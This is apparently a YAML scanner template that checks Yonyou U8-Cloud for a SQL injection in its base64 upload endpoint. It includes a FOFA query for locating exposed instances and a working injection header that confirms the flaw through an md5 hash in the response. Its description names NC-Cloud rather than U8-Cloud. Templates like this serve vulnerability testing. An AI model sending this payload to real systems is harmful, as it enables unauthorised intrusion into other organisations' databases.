product: 用友U8-Cloud
vName: 用友U8-Cloud base64接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 用友U8-Cloud，大型企业数字化平台， 聚焦数字化管理、数字化经营、数字化商业，帮助大型企业实现 人、财、物、客的全面数字化，从而驱动业务创新与管理变革，与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类，68个细分行业，涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案，帮助企业全面落地数字化。用友NC-Cloud base64接口存在SQL注入漏洞
version: ''
note: ''
search:
  FOFA: app="用友-U8-Cloud"
protocol: http
link: https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247485783&idx=2&sn=8233958995868f7379fa9a0d4f7f803a&chksm=974b8450a03c0d46e7bf22dd4f1b11ecf7faeec475ef5d071fde837c41100c24b76ae1a83975&scene=178&cur_album_id=2873032428486115330#rd
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /u8cloud/api/file/upload/base64
      header:
        system: -1' or 1=sys.fn_sqlvarbasetostr(HASHBYTES('md5','123456'))--+
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and